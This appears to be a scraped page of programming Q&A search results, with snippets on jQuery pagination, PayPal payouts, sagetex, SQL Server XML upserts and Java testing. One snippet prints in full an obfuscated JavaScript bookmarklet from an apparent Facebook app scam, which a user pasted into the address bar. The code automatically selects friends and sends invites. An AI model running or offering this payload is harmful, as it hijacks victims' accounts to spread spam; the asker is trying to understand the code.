Search Results

Search found 15860 results on 635 pages for 'document oriented databas'.

Page 546/635 | < Previous Page | 542 543 544 545 546 547 548 549 550 551 552 553  | Next Page >

  • Two jquery pagination plugin in the same page doesn't seem to work....

    - by Pandiya Chendur
    I use jquery pagination plugin for paging... If there is one pagination plugin there is no problem for me... But if there is two one seems to work but the other doesn't seem too... Here is my code, <div id="PagerUp" class="pager"> </div><br /><br /><br /> <div id="ResultsDiv"> </div> <div id="PagerDown" class="pager"> </div> And my jquery has, <script type="text/javascript"> var itemsPerPage = 5; $(document).ready(function() { getRecordspage(0, itemsPerPage); var maxvalues = $("#HfId").val(); $(".pager").pagination(maxvalues, { callback: getRecordspage, current_page: 0, items_per_page: itemsPerPage, num_display_entries: 5, next_text: 'Next', prev_text: 'Prev', num_edge_entries: 1 }); }); </script> Here is what i am getting... Both works but Look at the pagerup the selected page is 3 but the PagerDown shows 1.... How to change one pager on other pagers callback event in jquery....

    Read the article

  • How do I implement "cash out" on my site using PayPal?

    - by Alex
    I have a credit system set up on my site where user A can purchase a document from user B, let's say for 1 credit and user B's account gets credited, let's say for $1. User B can then "cash out" and recieve the money they earned from my (the site's) PayPal account into their PayPal account (let's assume that their email address is valid for now). When user A purchases a credit, they are taken to PayPal where they can login and complete the purchase, for this purpose I have an IPN listener set up on my site that stores credit information to my site's database. However, I can't find a mechanism to send the "cash out" information (i.e. user's email and amount to be paid) to PayPal. To elaborate: I understand that PayPal sends the IPN when someone purchases from me, but how do I post from my site to PayPal when the user clicks the "cash out" button? I have seen mention of Mass Pay, but can't seem to locate any code samples to go from. Am I missing something, or is there perhaps a different (and better) way to do this? Thanks!

    Read the article

  • Assign sage variable values into R objects via sagetex and Sweave

    - by sheed03
    I am writing a short Sweave document that outputs into a Beamer presentation, in which I am using the sagetex package to solve an equation for two parameters in the beta binomial distribution, and I need to assign the parameter values into the R session so I can do additional processing on those values. The following code excerpt shows how I am interacting with sage: <<echo=false,results=hide>>= mean.raw <- c(5, 3.5, 2) theta <- 0.5 var.raw <- mean.raw + ((mean.raw^2)/theta) @ \begin{frame}[fragile] \frametitle{Test of Sage 2} \begin{sagesilent} var('a1, b1, a2, b2, a3, b3') eqn1 = [1000*a1/(a1+b1)==\Sexpr{mean.raw[1]}, ((1000*a1*b1)*(1000+a1+b1))/((a1+b1)^2*(a1+b1+1))==\Sexpr{var.raw[1]}] eqn2 = [1000*a2/(a2+b2)==\Sexpr{mean.raw[2]}, ((1000*a2*b2)*(1000+a2+b2))/((a2+b2)^2*(a2+b2+1))==\Sexpr{var.raw[2]}] eqn3 = [1000*a3/(a3+b3)==\Sexpr{mean.raw[3]}, ((1000*a3*b3)*(1000+a3+b3))/((a3+b3)^2*(a3+b3+1))==\Sexpr{var.raw[3]}] s1 = solve(eqn1, a1,b1) s2 = solve(eqn2, a2,b2) s3 = solve(eqn3, a3,b3) \end{sagesilent} Solutions of Beta Binomial Parameters: \begin{itemize} \item $\sage{s1[0]}$ \item $\sage{s2[0]}$ \item $\sage{s3[0]}$ \end{itemize} \end{frame} Everything compiles just fine, and in that slide I am able to see the solutions to the three equations respective parameters in that itemized list (for example the first item in the itemized list from that beamer slide is outputted as [a1=(328/667), b1=(65272/667)] (I am not able to post an image of the beamer slide but I hope you get the idea). I would like to save the parameter values a1,b1,a2,b2,a3,b3 into R objects so that I can use them in simulations. I cannot find any documentation in the sagetex package on how to save output from sage commands into variables for use with other programs (in this case R). Any suggestions on how to get these values into R?

    Read the article

  • Obfuscated Javascript Code from Facebook Application?

    - by V.K.
    This is the code that was copied and pasted into my address bar: javascript:(function() {a='app117970624901700_jop';b='app117970624901700_jode';ifc='app117970624901700_ifc';ifo='app1179 70624901700_ifo';mw='app117970624901700_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return (c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)) {while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c]) p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e= ["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N \\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\ p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g \\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\ \F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d [e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e [15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e [5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x 70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document| mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})(); I ran it through http://jsbeautifier.org/ , but it didn't clean up the later part dealing with the "new RegExp"... anyone know what this code does and how to figure it out?

    Read the article

  • Update or Insert Row depending on whether row is present in Microsoft SQL Server 2005

    - by Srikanth
    Hi, I am passing a XML document as a input to a stored procedure in Microsoft SQL Server 2005. This is the sample XML being passed as input <Strategy StrategyID="0" TOStrategyID="8" ShutdownQtySell="1" ShutdownQtyBuy="1"> <ParameterRange ParameterSetID="6" ParameterRangeID="1" ParameterRangeFrom="0" ParameterRangeTo="20" ParameterAutoTakeOut="False"> </ParameterRange> <ParameterRange ParameterSetID="6" ParameterRangeID="4" ParameterRangeFrom="21" ParameterRangeTo="40" ParameterAutoTakeOut="False"> </ParameterRange> <ParameterRange ParameterSetID="6" ParameterRangeID="5" ParameterRangeFrom="41" ParameterRangeTo="60" ParameterAutoTakeOut="False"> </ParameterRange> <ParameterRange ParameterSetID="6" ParameterRangeID="6" ParameterRangeFrom="61" ParameterRangeTo="80" ParameterAutoTakeOut="False"> </ParameterRange> <ParameterRange ParameterSetID="6" ParameterRangeID="7" ParameterRangeFrom="81" ParameterRangeTo="100" ParameterAutoTakeOut="False"> </ParameterRange> </Strategy> I am able to retrieve the data using OpenXML functionality in SQL server I am using this to get the data corresponding to ParameterRange rows SELECT ParameterRangeID as iRangeID, ParameterSetID as iSetID, ParameterRangeFrom as fRangeFrom, ParameterRangeTo as fRangeTo, ParameterAutoTakeOut as bTakeoutEnabled FROM OPENXML(@idoc, '/Strategy/ParameterRange', 1) WITH (ParameterSetID int,ParameterRangeID int,ParameterRangeFrom float,ParameterRangeTo float,ParameterAutoTakeOut bit) Now, I need to insert/update these rows into a table TempRanges which has (iRangeID,iSetID) as the primary key. If there is a row with the primary key, I want to update it the latest values and If there is no row with that primary key, I need to insert into the table. How can I accomplish this inside the Stored Procedure ? Thanks, Sri

    Read the article

  • why the main method are not covered? urgent, please help me

    - by Mike.Huang
    main method: public static void main(String[] args) throws Exception { if (args.length != EXPECTED_NUMBER_OF_ARGUMENTS) { System.err.println("Usage - java XFRCompiler ConfigXML PackageXML XFR"); } String configXML = args[0]; String packageXML = args[1]; String xfr = args[2]; AutoConfigCompiler compiler = new AutoConfigCompiler(); compiler.setConfigDocument(loadDocument(configXML)); compiler.setPackageInfoDoc(loadDocument(packageXML)); // compiler.setVisiblityDoc(loadDocument("VisibilityFilter.xml")); compiler.compileModel(xfr); } private static Document loadDocument(String fileName) throws Exception { TXDOMParser parser = (TXDOMParser) ParserFactory.makeParser(TXDOMParser.class.getName()); InputSource source = new InputSource(new FileInputStream(fileName)); parser.parse(source); return parser.getDocument(); } testcase: @Test public void testCompileModel() throws Exception { // construct parameters URL configFile = Thread.currentThread().getContextClassLoader().getResource("Ford_2008_Mustang_Config.xml"); URL packageFile = Thread.currentThread().getContextClassLoader().getResource("Ford_2008_Mustang_Package.xml"); File tmpFile = new File("Ford_2008_Mustang_tmp.xfr"); if(!tmpFile.exists()) { tmpFile.createNewFile(); } String[] args = new String[]{configFile.getPath(),packageFile.getPath(),tmpFile.getPath()}; try { // test main method XFRCompiler.main(args); } catch (Exception e) { assertTrue(true); } try { // test args length is less than 3 XFRCompiler.main(new String[]{"",""}); } catch (Exception e) { assertTrue(true); } tmpFile.delete(); } coverage outputs displayed as the lines from “String configXML = args[0];" in main method are not covered

    Read the article

  • How can i change a jquery plugin's option value with my value?

    - by Pandiya Chendur
    I have just jquery pagination plugin to work... But what happens is when i click page number 2 i get the first page and when i click 3 i get second page and so on.... My initial page my current page value changes to 0 instead 1 this causes the problem... My plugin has this, jQuery.fn.pagination = function(maxentries, opts){ opts = jQuery.extend({ items_per_page:10, num_display_entries:10, current_page:0, num_edge_entries:0, link_to:"#", prev_text:"Prev", next_text:"Next", ellipse_text:"...", prev_show_always:true, next_show_always:true, callback:function(){return false;} },opts||{}); current_page is set to 0 ... I have modified the current page value in my jquery function but it doesn't seem to work.... <script type="text/javascript"> var itemsPerPage = 5; var maxNumberOfElementsHere = 17; $(document).ready(function() { getRecordspage(1, itemsPerPage); $(".pager").pagination(maxNumberOfElementsHere, { callback: getRecordspage, current_page: 1, // Look here i have changed this but it doesn't work... items_per_page: itemsPerPage, num_display_entries: 5, next_text: 'Next', prev_text: 'Prev', num_edge_entries: 1 }); }); </script>

    Read the article

  • Sliding & hiding multiple panels in jQuery.

    - by lloydphillips
    I have a table with multiple rows in each row is a select list and based on the selection (when the onchange event is fired) panels appear containing additional data below the row.I currently have code like this: var allPnls = '.inv-dtl-comnts-add,.inv-dtl-comnts-update'; $(document).ready(function(){ hideAll(); //select action change $(".inv-dtl-ddlaction").change(onSelectChange); $(".btn-cancel").click(function(event){ slideAll(); $(".inv-dtl-ddlaction").val('[Select an Action]'); return false; }); }); function onSelectChange(event){ //find out which select item was clicked switch($(this).val()) { case 'View/Add Comment': $(this).closest(".row").children(allPnls).slideUp("fast", function(){ $(this).closest(".row").children(".inv-dtl-comnts-add").slideToggle("fast"); }); break; case 'Change Status': $(this).closest(".row").children(allPnls).slideUp("fast", function(){ $(this).closest(".row").children(".inv-dtl-comnts-update").slideToggle("fast"); }); break; default: //code to be executed if n is different from case 1 and 2 } } function hideAll(){ $(allPnls).hide(); } function slideAll(){ $(allPnls).slideUp("fast"); } So I'm hiding all the panels when the page loads and if a panel is already open I want to slide it shut before reopening the new panel. This works with the postback. With just one panel in the selection it worked great but with two panels the sliding up happens twice (it seems to slide down unopened panels before sliding them back up again). How can I adjust this so that I can get all panels listed in the variable allPnls to slide shut ONLY if they are already open? Is there a better way of sliding the panels shut and then having a callback to have the slideToggle work? Lloyd

    Read the article

  • Fixed div once page is scrolled is flickering

    - by jasondavis
    I am trying to have an advertisement block/div that will be hald way down the page, once you scroll do the page to this point it will stick to the top. Here is a demo of what I am trying to do and the code I am using to do it with... http://jsfiddle.net/jasondavis/6vpA7/3/embedded/result/ In the demo it works perfectly how I am wanting it to be, however when I implement it on my live site, http://goo.gl/zuaZx it works but when you scroll down the div flickers in and out of view on each scroll or down key press. On my site to see the problem live it is the blokc on the right sidebar that says "Recommended Books" Here is the code I am using... $(document).ready( function() { $(window).scroll( function() { if ($(window).scrollTop() > $('#social-container').offset().top) $('#social').addClass('floating'); else $('#social').removeClass('floating'); } ); } );? css #social.floating { position: fixed; top: 0; }? My demo jsfiddle where it works correctly http://jsfiddle.net/jasondavis/6vpA7/3/ The only thing different on my live site is the div/id name is different. As you can see it is somewhat working on my live site except the flickering in and out of view as you scroll down the page. Anyone have any ideas why this would happen on my live site and not on my jsfiddle demo?

    Read the article

  • Remove second class from an element and add another class

    - by rahul
    Hi, $(document).ready ( function () { $(".MenuItem").mouseover ( function () { // Remove second class and add another class [ Maintain MenuItem class ] // Eg: For div1 remove Sprite1 and then add Sprite1Dis and for div2 // remove Sprite2 and add Spprite2Dis }); $(".MenuItem").mouseout ( function () { // Reverse of mouseover. ie Remove Sprite1Dis and add Sprite1 }); }); <div id="div1" class="MenuItem Sprite1"> &nbsp; </div> <div id="div2" class="MenuItem Sprite2"> &nbsp; </div> <div id="div3" class="MenuItem Sprite3"> &nbsp; </div> <div id="div4" class="MenuItem Sprite4"> &nbsp; </div> <div id="div5" class="MenuItem Sprite5"> &nbsp; </div> <div id="div6" class="MenuItem Sprite6"> &nbsp; </div> My problem is listed as comment inside the code section. What will be the easiest way to achieve this? Thanks in advance

    Read the article

  • How to emulate mod_rewrite in PHP

    - by Tyler Crompton
    I have a few URLs that I want to map to certain files via PHP. Currently, I am just using mod_rewrite in Apache. However, my application is getting too large for the rewriting to be done with regular expressions. So I created a file router.php that does the rewriting. I understand to do a redirect I could just send the Location: header. However, I don't always want to do a redirect. For example, I may want /api/item/ to map to the file /herp/derp.php relative to the document root. I need to preserve the HTTP method as well. "No problem," I thought. I made my .htaccess have the following snippet. RewriteEngine On RewriteRule ^api/item/$ /cgi-bin/router.php [L] And my router.php file looks as follows: <?php $uri = parse_url($_SERVER['REQUEST_URI']); $query = isset($uri['query']) ? $uri['query'] ? array(); // some code that modifies the query require_once "{$_SERVER['DOCUMENT_ROOT']}/herp/derp.php?" . http_build_query($query); ?> However, this doesn't work, because the OS is looking for a file named derp.php?some=query. How can I simulate a rewrite rule such as RewriteRule ^api/item/$ /herp/derp/ [L] in PHP. In other words, how do I tell the server to process a different URL than requested and preserve the query and HTTP method without causing a redirect? Note: Using variables set in router.php is less than desirable and is bad structure since it's only supposed to be responsible for handling URLs. I am open to using a light-weight third party solution.

    Read the article

  • jquery load returns empty, possible MVC 2 problem?

    - by Max Fraser
    I have a site that need to get some data from a different sit that is using asp.net MVC/ The data to get loaded is from these pages: http://charity.hondaclassic.com/home/totaldonations http://charity.hondaclassic.com/Home/CharityList This should be a no brainer but for some reason I get an empty response, here is my JS: <script> jQuery.noConflict(); jQuery(document).ready(function($){ $('.totalDonations').load('http://charity.hondaclassic.com/home/totaldonations'); $('#charityList').load('http://charity.hondaclassic.com/home/CharityList'); }); </script> in firebug I see the request is made and come back with a response of 200 OK but the response is empty, if you browse to these pages they work fine! What the heck? Here are the controller actions from the MVC site: public ActionResult TotalDonations() { var total = "$" + repo.All<Customer>().Sum(x => x.AmountPaid).ToString(); return Content(total); } public ActionResult CharityList() { var charities = repo.All<Company>(); return View(charities); } Someone please out what stupid little thing I am missing - this should have taken me 5 minutes and it's been hours!

    Read the article

  • JQuery Dragging Outside Parent

    - by Andy
    I'm using JQuery's draggable(); to make li elements draggable. The only problem is when the element is dragged outside its parent, it doesn't show up. That is, it doesn't leave the confines of its parent div. An example is here: http://imgur.com/N2N1L.png - it's as if the z-index for everything else has greater priority (and the element slides under everything). Here's the code: $('.photoList li').draggable({ distance: 20, snap: theVoteBar, revert: true, containment: 'document' }); And the li elements are placed in DIVs like this: <div class="coda-slider preload" id="coda-slider-1"> <div class="panel"> <div class="panel-wrapper"> <h2 class="title" style="display:none;">Page 1</h2> <ul class="photoList"> <li> <img class="ui-widget-content" src="photos/1.jpg" style="width:100px;height:100px;" /> </li> </ul> </div> </div> I'm positive the problem is it won't leave its parent container, but I'm not sure what to do to get it out. Any direction or help would be appreciated GREATLY!

    Read the article

  • How do I animate text links in jquery?

    - by Peter
    I am somewhat new to jquery and I have a problem with something I am trying to implement using jquery. I have a vertical navigation menu where each link animates on hover by changing color, increasing letter spacing, and adding a border on the left. Everything is working the way I want it to except for when I click on the link. After I click on the link, the text changes to a different color and remains that same color even when I hover over the link. I am wanting to make it to where the color change on hover remains intact even after I click the link. I'm sure I am missing something simple, but I have tried everything I know to do with no luck. Any suggestions would be helpful! Here is what I have for the animation... <script type="text/javascript"> $(document).ready(function(){ $("ul.navlist li a").hover(function(){ $(this).stop() .animate({paddingLeft: '10px',letterSpacing: '2px',borderWidth:'20px'},{queue:false,easing:'easeInQuad'},50) }, function(){ $(this).stop() .animate({paddingLeft: '0px', letterSpacing: '0px',borderWidth:'0px'},{queue:false,easing:'easeOutQuad'},50) }); }); </script> My css for the navigation list is here... .navlist { list-style: none; } .navlist a { border-left-color: #555555; border-left-style: solid; border-left-width: 0px; color: #c4c4c4; } .navlist a:hover { border-left-color: #555555; border-left-style: solid; color: #555555; }

    Read the article

  • Issue reading in a cell from Excel with Apache POI

    - by Nick
    I am trying to use Apache POI to read in old (pre-2007 and XLS) Excel files. My program goes to the end of the rows and iterates back up until it finds something that's not either null or empty. Then it iterates back up a few times and grabs those cells. This program works just fine reading in XLSX and XLS files made in Office 2010. I get the following error message: Exception in thread "main" java.lang.NumberFormatException: empty String at sun.misc.FloatingDecimal.readJavaFormatString(Unknown Source) at java.lang.Double.parseDouble(Unknown Source) at the line: num = Double.parseDouble(str); from the code: str = cell.toString(); if (str != "" || str != null) { System.out.println("Cell is a string"); num = Double.parseDouble(str); } else { System.out.println("Cell is numeric."); num = cell.getNumericCellValue(); } where the cell is the last cell in the document that's not empty or null. When I try to print the first cell that's not empty or null, it prints nothing, so I think I'm not accessing it correctly.

    Read the article

  • Trying to fadein divs in a sequence, over time, using JQuery

    - by user346602
    Hi, I'm trying to figure out how to make 4 images fade in sequentially when the page loads. The following is my (amateurish) code: Here is the HTML: <div id="outercorners"> <img id="corner1" src="images/corner1.gif" width="6" height="6" alt=""/> <img id="corner2" src="images/corner2.gif" width="6" height="6" alt=""/> <img id="corner3" src="images/corner3.gif" width="6" height="6" alt=""/> <img id="corner4" src="images/corner4.gif" width="6" height="6" alt=""/> </div><!-- end #outercorners--> Here is the JQuery: $(document).ready(function() { $("#corner1").fadeIn("2000", function(){ $("#corner3").fadeIn("4000", function(){ $("#corner2").fadeIn("6000", function(){ $("#corner4").fadeIn("8000", function(){ }); }); }); }); Here is the css: #outercorners { position: fixed; top:186px; left:186px; width:558px; height:372px; } #corner1 { position: fixed; top:186px; left:186px; display: none; } #corner2 { position: fixed; top:186px; left:744px; display: none; } #corner3 { position: fixed; top:558px; left:744px; display: none; } #corner4 { position: fixed; top:558px; left:186px; display: none; } They seem to just wink at me, rather than fade in in the order I've ascribed to them. Should I be using the queue() function? And, if so, how would I implement it in this case? Thank you for any assistance.

    Read the article

  • asp.net jquery how to use Plugin/Validation with web content

    - by Eyla
    I have a asp.net web content from that have a asp.net textbox and I want to use Plugin/Validation but it is not working with me here is my code: <%@ Page Title="" Language="C#" MasterPageFile="~/Master.Master" AutoEventWireup="true" CodeBehind="WebForm1.aspx.cs" Inherits="IMAM_APPLICATION.WebForm1" %> <%@ Register assembly="AjaxControlToolkit" namespace="AjaxControlToolkit" tagprefix="asp" %> <asp:Content ID="Content1" ContentPlaceHolderID="head" runat="server"> <script src="js/jquery-1.4.1.js" type="text/javascript"></script> <script src="js/jquery.validate.js" type="text/javascript"></script> <script type="text/javascript"> $(document).ready(function() { $.validator.addMethod("#<%=TextBox1.ClientID %>", function(value, element) { return this.optional(element) || /^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,16}$/i.test(value); }, "Passwords are 8-16 characters with uppercase letters, lowercase letters and at least one number."); }); </script> </asp:Content> <asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" runat="server"> </asp:Content> <asp:Content ID="Content3" ContentPlaceHolderID="ContentPlaceHolder2" runat="server"> <asp:TextBox ID="TextBox1" runat="server"></asp:TextBox> </asp:Content>

    Read the article

  • jquery image fading with tabs

    - by StealthRT
    Hey all, i am trying my best to figure out how to go about doing this: I have 2 tabs. When the page loads tab1 is selected automatically. This shows the tab as 1.0 transparency while tab2 stays at 0.7. Once the user clicks on tab2, tab1 goes to 0.7 transparency and tab2 goes to 1.0. However, i can not seem to get it to do that! Here is my code: <script type="text/javascript"> function checkTab(theTab) { $('#tab1').fadeTo(250, 0.70); $('#tab2').fadeTo(250, 0.70); if ($("#tabActive").val() == theTab) { $(theTab).fadeTo(250, 1); } } $(document).ready(function() { $('#tab1').hover(function() {$(this).fadeTo(250, 1)}, function() {checkTab('#tab1')}); $('#tab2').hover(function() {$(this).fadeTo(250, 1)}, function() {checkTab('#tab2')}); $('#tab2').fadeTo(250, 0.70); $('#tabActive').val('tab1'); }); </script> <li class="stats"><img src="images/Stats.png" name="nav1" width="70" height="52" id="tab1" onclick="$('#tabActive').val('tab1');" /></li> <li class="cal"><img src="images/cal.png" name="nav1" width="70" height="52" id="tab2" onclick="$('#tabActive').val('tab2');" /></li> <input name="tabActive" id="tabActive" type="text" /> Any help would be great! :) David

    Read the article

  • Latex - Apply an operation to every character in a string

    - by hroest
    Hi I am using LaTeX and I have a problem concerning string manipulation. I want to have an operation applied to every character of a string, specifically I want to replace every character "x" with "\discretionary{}{}{}x". I want to do this because I have a long string (DNA) which I want to be able to separate at any point without hyphenation. Thus I would like to have a command called "myDNA" that will do this for me instead of inserting manually \discretionary{}{}{} after every character. Is this possible? I have looked around the web and there wasnt much helpful information on this topic (at least not any I could understand) and I hoped that you could help. --edit To clarify: What I want to see in the finished document is something like this: the dna sequence is CTAAAGAAAACAGGACGATTAGATGAGCTTGAGAAAGCCATCACCACTCA AATACTAAATGTGTTACCATACCAAGCACTTGCTCTGAAATTTGGGGACTGAGTACACCAAATACGATAG ATCAGTGGGATACAACAGGCCTTTACAGCTTCTCTGAACAAACCAGGTCTCTTGATGGTCGTCTCCAGGT ATCCCATCGAAAAGGATTGCCACATGTTATATATTGCCGATTATGGCGCTGGCCTGATCTTCACAGTCAT CATGAACTCAAGGCAATTGAAAACTGCGAATATGCTTTTAATCTTAAAAAGGATGAAGTATGTGTAAACC CTTACCACTATCAGAGAGTTGAGACACCAGTTTTGCCTCCAGTATTAGTGCCCCGACACACCGAGATCCT AACAGAACTTCCGCCTCTGGATGACTATACTCACTCCATTCCAGAAAACACTAACTTCCCAGCAGGAATT just plain linebreaks, without any hyphens. The DNA sequence will be one long string without any spaces or anything but it can break at any point. This is why my idea was to inesert a "\discretionary{}{}{}" after every character, so that it can break at any point without inserting any hyphens.

    Read the article

  • javascript: waiting for an iframe page to load before writing to it (but not from the page that's tr

    - by Bill Dawes
    Apologies if this has been answered elsewhere, but I haven't been able to find it referenced. (Probably because nobody else would want to do such a daft thing, I admit). So, I have a page with three iframes in it. An event on one triggers a javascript function which loads new pages into the other two iframes; ['topright'] and ['bottomright']. However, javascript in the page that is being loaded into iframe 'topright' then needs to send information to elements in the 'bottomright' iframe. window.frames['bottomright'].document.subform.ID_client = client; etc But this will only work if the page has fully loaded into the bottomright frame. So what would be the most efficient way for that code in the 'topright' iframe to check and ensure that that form element in the bottomright frame is actually available to write to, before it does write to it? Bearing in mind that the page load has NOT been triggered from the topright frame, so I can't simply use an onLoad function. (I know this probably sounds like a hideously tortuous route for getting data from one page to another, but that's another story. The client is always right, etc...:-))

    Read the article

  • Unable to send '+' through AJAX post?

    - by Harish Kurup
    I am using Ajax POST method to send data, but i am not able to send '+'(operator to the server i.e if i want to send 1+ or 20k+ it will only send 1 or 20k..just wipe out '+') HTML code goes here.. <form method='post' onsubmit='return false;' action='#'> <input type='input' name='salary' id='salary' /> <input type='submit' onclick='submitVal();' /> </form> and javascript code goes here, function submitVal() { var sal=document.getElementById("salary").value; alert(sal); var request=getHttpRequest(); request.open('post','updateSal.php',false); request.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); request.send("sal="+sal); if(request.readyState == 4) { alert("update"); } } function getHttpRequest() { var request=false; if(window.XMLHttpRequest) { request=new XMLHttpRequest(); } else if(window.ActiveXObject) { try { request=new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { request=new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { request=false; } } } return request; } in the function submitVal() it first alert's the salary value as it is(if 1+ then alerts 1+), but when it is posted it just post's value without '+' operator which is needed... is it any problem with query string, as the PHP backend code is working fine...

    Read the article

  • Django Template For Loop Removing <img> Self-Closing

    - by Zack
    Django's for loop seems to be removing all of my <img> tag's self-closing...ness (/>). In the Template, I have this code: {% for item in item_list %} <li> <a class="left" href="{{ item.url }}">{{ item.name }}</a> <a class="right" href="{{ item.url }}"> <img src="{{ item.icon.url }}" alt="{{ item.name }} Logo." /> </a> </li> {% endfor %} It outputs this: <li> <a class="left" href="/some-url/">This is an item</a> <a class="right" href="/some-url/"> <img src="/media/img/some-item.jpg" alt="This is an item Logo."> </a> </li> As you can see, the <img> tag is no longer closed, and thus the page doesn't validate. This isn't a huge issue since it'll still render properly in all browsers, but I'd like to know how to solve it. I've tried wrapping the whole for loop in {% autoescape off %}...{% endautoescape %} but that didn't change anything. All other self-closed <img> tags in the document outside the for loop still properly close.

    Read the article

  • add dynamic field near his parent field?

    - by Kaps Hasija
    hi in my web page i am using Add Dynamic Field Functionality by using jquery. I am adding new div bu clicking on Existing div Like <div class="divA">divA1 </div> <div class="divB" >DivB1 </div> <div class="divC" />DivC1 </div> by clicking on parent div i am creating new daynamic div <div class="divA">DivA2 </div> its coming end of the all div's like that <div class="divA">divA1 </div> <div class="divB" >DivB1 </div> <div class="divC" />DivC1 </div> <div class="divA">DivA2 </div> But i need along with his parent div Like that <div class="divA">divA1 </div> <div class="divA">DivA2 </div> <div class="divB" >DivB1 </div> <div class="divC" />DivC1 </div> any idea Thanks. This is My Jquery Code newTextBoxDiv = $(document.createElement('div')) .attr("id", text).attr("class", 'test0 ' + text); newTextBoxDiv.html('<div style=" width:150px; class="DivA" float: left"> </div>'); } newTextBoxDiv.appendTo("#contents"); contents is id of main div

    Read the article

  • How do I use HTML5's localStorage in a Google Chrome extension?

    - by davidkennedy85
    I am trying to develop an extension that will work with Awesome New Tab Page. I've followed the author's advice to the letter, but it doesn't seem like any of the script I add to my background page is being executed at all. Here's my background page: <script> var info = { poke: 1, width: 1, height: 1, path: "widget.html" } chrome.extension.onRequestExternal.addListener(function(request, sender, sendResponse) { if (request === "mgmiemnjjchgkmgbeljfocdjjnpjnmcg-poke") { chrome.extension.sendRequest( sender.id, { head: "mgmiemnjjchgkmgbeljfocdjjnpjnmcg-pokeback", body: info, } ); } }); function initSelectedTab() { localStorage.setItem("selectedTab", "Something"); } initSelectedTab(); </script> Here is manifest.json: { "update_url": "http://clients2.google.com/service/update2/crx", "background_page": "background.html", "name": "Test Widget", "description": "Test widget for mgmiemnjjchgkmgbeljfocdjjnpjnmcg.", "icons": { "128": "icon.png" }, "version": "0.0.1" } Here is the relevant part of widget.html: <script> var selectedTab = localStorage.getItem("selectedTab"); document.write(selectedTab); </script> Every time, the browser just displays null. The local storage isn't being set at all, which makes me think the background page is completely disconnected. Do I have something wired up incorrectly?

    Read the article

  • Javascript onclick() event bubbling - working or not?

    - by user1071914
    I have a table in which the table row tag is decorated with an onclick() handler. If the row is clicked anywhere, it will load another page. In one of the elements on the row, is an anchor tag which also leads to another page. The desired behavior is that if they click on the link, "delete.html" is loaded. If they click anywhere else in the row, "edit.html" is loaded. The problem is that sometimes (according to users) both the link and the onclick() are fired at once, leading to a problem in the back end code. They swear they are not double-clicking. I don't know enough about Javascript event bubbling, handling and whatever to even know where to start with this bizarre problem, so I'm asking for help. Here's a fragment of the rendered page, showing the row with the embedded link and associated script tag. Any suggestions are welcomed: <tr id="tableRow_3339_0" class="odd"> <td class="l"></td> <td>PENDING</td> <td>Yabba Dabba Doo</td> <td>Fred Flintstone</td> <td> <a href="/delete.html?requestId=3339"> <div class="deleteButtonIcon"></div> </a> </td> <td class="r"></td> </tr> <script type="text/javascript">document.getElementById("tableRow_3339_0").onclick = function(event) { window.location = '//edit.html?requestId=3339'; };</script>

    Read the article

< Previous Page | 542 543 544 545 546 547 548 549 550 551 552 553  | Next Page >